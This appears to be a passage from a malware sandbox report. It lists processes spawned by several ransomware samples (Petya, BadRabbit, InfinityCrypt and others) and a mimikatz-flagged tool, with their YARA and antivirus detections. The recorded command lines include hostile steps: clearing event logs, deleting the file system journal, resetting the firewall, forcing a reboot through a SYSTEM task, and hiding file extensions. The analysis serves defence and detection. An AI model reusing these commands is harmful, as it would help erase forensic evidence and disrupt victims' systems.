                                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\system32\netsh.exe advfirewall reset
                                                                                                                                                Imagebase:0x10f0000
                                                                                                                                                File size:82944 bytes
                                                                                                                                                MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:28
                                                                                                                                                Start time:14:48:37
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:29
                                                                                                                                                Start time:14:48:37
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe"
                                                                                                                                                Imagebase:0x800000
                                                                                                                                                File size:216064 bytes
                                                                                                                                                MD5 hash:B805DB8F6A84475EF76B795B0D1ED6AE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 0000001D.00000000.318134317.0000000000813000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 0000001D.00000002.560337902.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 0000001D.00000000.317905991.0000000000802000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 0000001D.00000002.562286254.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe, Author: ditekSHen
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 85%, ReversingLabs
                                                                                                                                                • Detection: 60%, Metadefender, Browse

                                                                                                                                                Target ID:30
                                                                                                                                                Start time:14:48:37
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:31
                                                                                                                                                Start time:14:48:37
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\EF39.tmp
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\EF39.tmp" \\.\pipe\{96A4BC70-5646-4F34-828D-297F35E216CA}
                                                                                                                                                Imagebase:0x7ff651c80000
                                                                                                                                                File size:62328 bytes
                                                                                                                                                MD5 hash:347AC3B6B791054DE3E5720A7144A977
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: mimikatz, Description: mimikatz, Source: 0000001F.00000000.322395857.00007FF64E9AE000.00000008.00000001.01000000.00000010.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                • Rule: mimikatz, Description: mimikatz, Source: 0000001F.00000002.326734991.00007FF64E9AE000.00000004.00000001.01000000.00000010.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                • Rule: mimikatz, Description: mimikatz, Source: 0000001F.00000000.319806431.00007FF64E9AE000.00000008.00000001.01000000.00000010.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                                                                • Rule: mimikatz, Description: mimikatz, Source: 0000001F.00000000.322099134.00007FF64E9AE000.00000008.00000001.01000000.00000010.sdmp, Author: Benjamin DELPY (gentilkiwi)

                                                                                                                                                Target ID:32
                                                                                                                                                Start time:14:48:38
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 2112656973 && exit
                                                                                                                                                Imagebase:0x7ff707bb0000
                                                                                                                                                File size:273920 bytes
                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:33
                                                                                                                                                Start time:14:48:39
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:34
                                                                                                                                                Start time:14:48:39
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:06:00
                                                                                                                                                Imagebase:0xf0000
                                                                                                                                                File size:185856 bytes
                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:35
                                                                                                                                                Start time:14:48:39
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:36
                                                                                                                                                Start time:14:48:41
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\dispci.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\dispci.exe" -id 2112656973
                                                                                                                                                Imagebase:0x1230000
                                                                                                                                                File size:142848 bytes
                                                                                                                                                MD5 hash:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                                                                                                • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 96%, ReversingLabs
                                                                                                                                                • Detection: 86%, Metadefender, Browse

                                                                                                                                                Target ID:37
                                                                                                                                                Start time:14:48:41
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:54569 bytes
                                                                                                                                                MD5 hash:87CCD6F4EC0E6B706D65550F90B0E3C7
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 96%, ReversingLabs
                                                                                                                                                • Detection: 86%, Metadefender, Browse

                                                                                                                                                Target ID:38
                                                                                                                                                Start time:14:48:42
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:39
                                                                                                                                                Start time:14:48:43
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1427968 bytes
                                                                                                                                                MD5 hash:63210F8F1DDE6C40A7F3643CCF0FF313
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 91%, ReversingLabs
                                                                                                                                                • Detection: 72%, Metadefender, Browse

                                                                                                                                                Target ID:40
                                                                                                                                                Start time:14:48:43
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:41
                                                                                                                                                Start time:14:48:47
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:wevtutil cl Setup
                                                                                                                                                Imagebase:0x1140000
                                                                                                                                                File size:167936 bytes
                                                                                                                                                MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:42
                                                                                                                                                Start time:14:48:47
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c schtasks /Delete /F /TN drogon
                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:43
                                                                                                                                                Start time:14:48:48
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:44
                                                                                                                                                Start time:14:48:49
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:45
                                                                                                                                                Start time:14:48:49
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:wevtutil cl System
                                                                                                                                                Imagebase:0x1140000
                                                                                                                                                File size:167936 bytes
                                                                                                                                                MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:46
                                                                                                                                                Start time:14:48:49
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:schtasks /Delete /F /TN drogon
                                                                                                                                                Imagebase:0xf0000
                                                                                                                                                File size:185856 bytes
                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:47
                                                                                                                                                Start time:14:48:50
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:230912 bytes
                                                                                                                                                MD5 hash:AF2379CC4D607A45AC44D62135FB7015
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: 0000002F.00000000.350343417.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Author: CCN-CERT
                                                                                                                                                • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: 0000002F.00000000.347435865.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Author: CCN-CERT
                                                                                                                                                • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: 0000002F.00000000.349191246.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Author: CCN-CERT
                                                                                                                                                • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: 0000002F.00000002.534820405.000000000041A000.00000080.00000001.01000000.00000015.sdmp, Author: CCN-CERT
                                                                                                                                                • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: 0000002F.00000000.351223575.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Author: CCN-CERT
                                                                                                                                                • Rule: Petya_Ransomware, Description: Detects Petya Ransomware, Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe, Author: Florian Roth
                                                                                                                                                • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe, Author: CCN-CERT
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, ReversingLabs
                                                                                                                                                • Detection: 84%, Metadefender, Browse

                                                                                                                                                Target ID:48
                                                                                                                                                Start time:14:48:50
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:wevtutil cl Security
                                                                                                                                                Imagebase:0x1140000
                                                                                                                                                File size:167936 bytes
                                                                                                                                                MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:49
                                                                                                                                                Start time:14:48:52
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:wevtutil cl Application
                                                                                                                                                Imagebase:0x1140000
                                                                                                                                                File size:167936 bytes
                                                                                                                                                MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:50
                                                                                                                                                Start time:14:48:53
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\fsutil.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:fsutil usn deletejournal /D C:
                                                                                                                                                Imagebase:0x1100000
                                                                                                                                                File size:145408 bytes
                                                                                                                                                MD5 hash:140A43A2237D7D7497D4E0568B518B71
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:51
                                                                                                                                                Start time:14:48:53
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:52
                                                                                                                                                Start time:14:48:54
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:225280 bytes
                                                                                                                                                MD5 hash:3ED3FB296A477156BC51ABA43D825FC0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 95%, ReversingLabs
                                                                                                                                                • Detection: 82%, Metadefender, Browse

                                                                                                                                                Target ID:53
                                                                                                                                                Start time:14:48:54
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:54
                                                                                                                                                Start time:14:48:56
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:taskkill /f /im "E"
                                                                                                                                                Imagebase:0x840000
                                                                                                                                                File size:74752 bytes
                                                                                                                                                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:55
                                                                                                                                                Start time:14:48:58
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:ping -n 1 127.0.0.1
                                                                                                                                                Imagebase:0x40000
                                                                                                                                                File size:18944 bytes
                                                                                                                                                MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:56
                                                                                                                                                Start time:14:49:00
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:57
                                                                                                                                                Start time:14:49:00
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe"
                                                                                                                                                Imagebase:
                                                                                                                                                File size:2511528 bytes
                                                                                                                                                MD5 hash:DBFBF254CFB84D991AC3860105D66FC6
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 45%, ReversingLabs
                                                                                                                                                • Detection: 31%, Metadefender, Browse

                                                                                                                                                Target ID:58
                                                                                                                                                Start time:14:49:01
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:207872 bytes
                                                                                                                                                MD5 hash:327F75561227DE039329A625537B56A2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:59
                                                                                                                                                Start time:14:49:07
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:60
                                                                                                                                                Start time:14:49:16
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\ProgramData\vsMwMYIk\LOAcQQUU.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\ProgramData\vsMwMYIk\LOAcQQUU.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:183808 bytes
                                                                                                                                                MD5 hash:0D6D628F4EAEA4532B8F79E83D4CF413
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML

                                                                                                                                                Target ID:61
                                                                                                                                                Start time:14:49:19
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:schtasks /Delete /F /TN rhaegal
                                                                                                                                                Imagebase:0xf0000
                                                                                                                                                File size:185856 bytes
                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:62
                                                                                                                                                Start time:14:49:18
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom"
                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:63
                                                                                                                                                Start time:14:49:18
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:64
                                                                                                                                                Start time:14:49:18
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                                                                                Imagebase:0x12e0000
                                                                                                                                                File size:59392 bytes
                                                                                                                                                MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:65
                                                                                                                                                Start time:14:49:19
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:225280 bytes
                                                                                                                                                MD5 hash:3ED3FB296A477156BC51ABA43D825FC0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:29.4%
                                                                                                                                                  Total number of Nodes:85
                                                                                                                                                  Total number of Limit Nodes:13
